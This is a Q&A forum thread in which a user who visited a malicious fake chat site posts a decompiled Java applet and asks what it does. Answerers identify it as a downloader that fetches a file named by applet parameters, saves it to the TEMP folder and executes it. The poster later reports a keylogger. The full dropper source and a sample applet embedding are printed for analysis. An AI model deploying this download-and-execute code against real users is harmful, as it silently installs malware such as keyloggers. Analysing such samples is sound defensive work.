# remove java key logger, looking through code

Tags: java

i went to this site **[Offending site name removed]** for reference its just folders to make it look like tiny chat, in "/chat/trimsdy" it has a small java file which automatically runs 
i cant remember properly but i may have accidentally run the packet (accepted it running)

so what i did was clear the java cache in the control panel 
then i went back on the site and attempted to download the java.jar file
i downloaded it and downloaded a java de-compiler and i have de-compiled the java.jar file,

i have the code here:

```
import java.applet.Applet;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.net.URLConnection;

public class Java extends Applet
{
  public void init()
  {
    String str1 = getParameter("jc9nvqlqnnd");
    String str2 = System.getenv("TEMP");
    String str3 = getParameter("ulztlykikct");
    try {
      FileOutputStream localFileOutputStream = new FileOutputStream(str2 + str1);
      URL localURL = new URL(getParameter("gze82pwlo3e"));
      URLConnection localURLConnection = localURL.openConnection();
      InputStream localInputStream = localURLConnection.getInputStream();
      byte[] arrayOfByte = new byte[1024];
      int i;
      while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1) {
        localFileOutputStream.write(arrayOfByte, 0, i);
      }
      localInputStream.close();
      localFileOutputStream.close();
      Runtime localRuntime = Runtime.getRuntime();
      localRuntime.exec(str2 + str1);
      System.exit(0);
    }
    catch (IOException localIOException) {
      System.exit(0);
    }
  }
}
```

could you help me figure out what it does i'm slightly confused
i can see that it does something in TEMP but from their i'm stuck
i'm a slight java noob so thanks for any help

thanks
reblerebel

Edit:

---

i looked throught the html on the page for the applet parameters and all it has is 
[image: print screen of applet code]
that is all the code in the applet

Edit:

---

Thank to everyone who helped and gave advice 
i think i'm safe 
thanks again 
Reblerebel

Edit:

---

turns out i did run it and i found in my %appdata% that it had downloaded the ccleaner.exe to my appdata and then in a file called java which contained a list of my keystrokes! for only about 5 mins because i can seem to remember ending a process running called java or something.
i have deleted ccleaner.exe and the java file
thanks everything search for finding the program

thanks everyone for helping so i didn't get key logged (too much)

Comment: Without knowing the values of the parameters, it's impossible to know for sure, but it opens a file in the temp directory and creates a file with the contents of the stream retrieved from whatever the URL is, and execs it.

Comment: It's downloading a program to disk; saving it in the user's temp directory, and executing it.

Comment: @JamesMontagne Better to highlight that the website will kill you; without the link, there's no way to do any research for those inclined to pursue the issue.

Comment: Click edit, and check the history for the URL. It was never the full URL, btw.

Answer (score 6, accepted):

That code downloads something from an URL, saves it somewhere in your `%TEMP%` folder, then tries to execute it.

The parameters are passed in to the applet via the HTML page that loads it. View the HTML for the page you downloaded this from, and you'll see, at the bottom, something like:

```
<applet width='0px' height='0px' code='Java.class' archive='Java.jar'>
<param name="gze82pwlo3e" value="http://url/omitted/in/case/its/bad">
<param name="jc9nvqlqnnd" value="CCleaner.exe">
<param name="ulztlykikct" value="">
</applet>
```

Comment: the thing is that there is not an actual url there

Comment: It's read from an applet parameter. The line is `URL localURL = new URL(getParameter("gze82pwlo3e"));` Same thing for the filename.

Comment: sorry for being such a noob but how do i do that

Comment: how do i find the applet parameters

Answer (score 2):

No way of knowing what it actually does without knowing what it's downloading.

That code basically writes a file in your temp, fills it up with the content of... something:

```
FileOutputStream localFileOutputStream = new FileOutputStream(str2 + str1);
  URL localURL = new URL(getParameter("gze82pwlo3e"));
  URLConnection localURLConnection = localURL.openConnection();
  InputStream localInputStream = localURLConnection.getInputStream();
  byte[] arrayOfByte = new byte[1024];
  int i;
  while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1) {
    localFileOutputStream.write(arrayOfByte, 0, i);
  }
  localInputStream.close();
  localFileOutputStream.close();
```

And then runs the file it just wrote. 
What it does? Depends on what it wrote on that file.

Answer (score 1):

It downloads a script or program which it writes to a file and then attempts to exec it. The names to use are specified in the parameters.

Answer (score 0):

Well, it downloads a file and excutes it. Nothing much to see here. You might want to know the values of the `jc9nvqlqnnd`, `ulztlykikct` and `gze82pwlo3e` parameters.

Now on the original site, it seems it downloads a file called `CCleaner.exe` that is recognized by most antivirus scanners as `Gen:Variant.Kazy.51365`.

Usually, your browser should not excute the Java file, though. Java applets are usually not allowed to download files and execute them without special privileges ...

So, what is actually your question?

Comment: how could i find that out i only just worked out how decompile

Comment: They are not in the source, but in the original web page.

Comment: i dont think they exist although i disabled java before i went on the site so i dont know if the result has been changed

Comment: They're there. Don't use a browser to see them, use e.g. `wget` or `curl` to load the URL. See Mat's answer, he got them, too. Anyway: the *Java* part doesn't contain a virus. It's just a downloader for a regular `.exe`  file.

Comment: oh gosh it does exist! lucky i dont think anything happened